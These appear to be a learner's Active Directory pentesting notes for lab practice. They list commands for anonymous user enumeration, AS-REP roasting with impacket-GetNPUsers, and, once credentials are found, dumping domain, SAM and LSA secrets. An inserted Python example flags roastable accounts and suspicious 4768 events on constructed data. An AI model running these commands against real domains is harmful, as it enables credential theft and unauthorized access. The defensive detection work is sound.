Active Directory Security

PRACTICE ! PRACTICE ! PRACTICE !

Enumerating the Usernames first!

If the anonymous user has READ permissions on the IPC$ share, then

$ impacket-lookupsid anonymous@10.10.117.62 | tee users.txt

Meanwhile, run enum4linux in the background

$ enum4linux -a 10.10.10.x | tee enum4linux.log

If rpcclient allows anonymous login, then

rpcclient $> enumdomusers
rpcclient $> enumdomgroups

AS-REP Roasting

After finding valid usernames, check whether any of them can be AS-REP roasted (accounts with Kerberos pre-authentication disabled)

$ impacket-GetNPUsers spooky.local/ -no-pass -usersfile users.txt -dc-ip <target ip> 
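A defender-side check for the same weakness, added here as an example and not part of the original notes: it lists accounts whose userAccountControl has the DONT_REQ_PREAUTH bit (0x400000) set, and filters Windows Security 4768 (TGT requested) events for pre-authentication type 0 combined with RC4 ticket encryption (0x17), the pattern that roasting tools leave on the domain controller. The account names, UAC values and events below are constructed sample data.

```python
# Added example (not from the original notes): defender-side checks for the
# AS-REP roasting exposure described above. All sample data is constructed.

DONT_REQ_PREAUTH = 0x400000  # userAccountControl flag: Kerberos pre-auth not required
RC4_HMAC = 0x17              # ticket encryption type requested by the classic roasting tools

# Constructed LDAP-style dump: sAMAccountName -> userAccountControl
SAMPLE_ACCOUNTS = {
    "svc_backup": 0x10200 | DONT_REQ_PREAUTH,  # normal account, pre-auth disabled
    "jdoe": 0x10200,                            # normal account, pre-auth required
    "old_admin": 0x10202 | DONT_REQ_PREAUTH,   # disabled account, still exposed if re-enabled
}

# Constructed 4768 events using the real event field names; one dict per event
SAMPLE_4768 = [
    {"TargetUserName": "svc_backup", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    {"TargetUserName": "jdoe", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.117.20"},
    {"TargetUserName": "svc_backup", "PreAuthType": "0",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.117.21"},  # AES, not matched
]


def roastable_accounts(accounts):
    """Return sorted account names whose UAC has DONT_REQ_PREAUTH set."""
    return sorted(name for name, uac in accounts.items() if uac & DONT_REQ_PREAUTH)


def suspicious_4768(events):
    """Return (account, source ip) pairs for TGT requests that carried no
    pre-authentication and asked for an RC4 ticket."""
    hits = []
    for ev in events:
        no_preauth = ev["PreAuthType"] == "0"
        rc4 = int(ev["TicketEncryptionType"], 16) == RC4_HMAC
        if no_preauth and rc4:
            hits.append((ev["TargetUserName"], ev["IpAddress"]))
    return hits


if __name__ == "__main__":
    print("pre-auth disabled:", roastable_accounts(SAMPLE_ACCOUNTS))
    print("roasting-like 4768:", suspicious_4768(SAMPLE_4768))
```

Feeding a real userAccountControl export or exported 4768 events into the two functions gives the accounts to fix (re-enable pre-authentication) and the source addresses to investigate.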

After Having Creds

  • Enumerate shares with those credentials - cme

  • Try dumping the domain secrets with them - impacket-secretsdump

  • Try dumping the SAM and LSA secrets - crackmapexec

  • Check WinRM, SMB and the other services until one of them reports Pwn3d
